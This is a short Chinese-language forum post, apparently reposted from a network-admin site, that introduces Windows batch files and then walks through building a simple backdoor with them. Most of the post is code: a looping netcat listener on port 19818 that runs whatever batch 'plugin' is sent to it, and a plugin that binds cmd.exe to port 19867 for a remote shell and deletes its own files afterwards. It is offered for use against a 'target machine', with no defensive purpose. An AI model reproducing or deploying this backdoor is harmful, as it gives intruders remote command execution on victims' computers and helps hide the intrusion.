批处理文件是无格式的文本文件,它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。使用批处理文件(也被称为批处理程序或脚本),可以简化日常或重复性任务。
我主要介绍一下批处理来实现简单的后门功能,
以下是一个简单的例子
echo off
:start
nc -vv -l -p 19818 >>shell.bat
find /I "@echo off" shell.bat >>start.bat
if exist start.bat call shell.bat
if exist exit.txt goto start
[/color=Red]
这样就是一个微型的Server端了,关键就在于插件的写法了,我简单的给大家些个正向连接cmdshell的插件做示范吧
@echo off
nc -l -p 19867 -e cmd.exe
cls >>exit.txt
del shell.bat
del start.bat
del exit.txt
[/color=Red]
这个很简陋,只要用nc 把这个提交到目标机的19818端口就可以得到一个正向连接的shell了,用nc连接19867端口看看。至于反弹shell怎么实现,我相信不用写了吧,其实bat的功能还很强大,就看你怎么去写了。上面用判断文件存在的方法其实很笨,一时想不起来命令了,所以用了点笨办法不好意思啦 中国网管联盟www、bitsCN、com
有不明白的地方或则要指教的地方请看留言
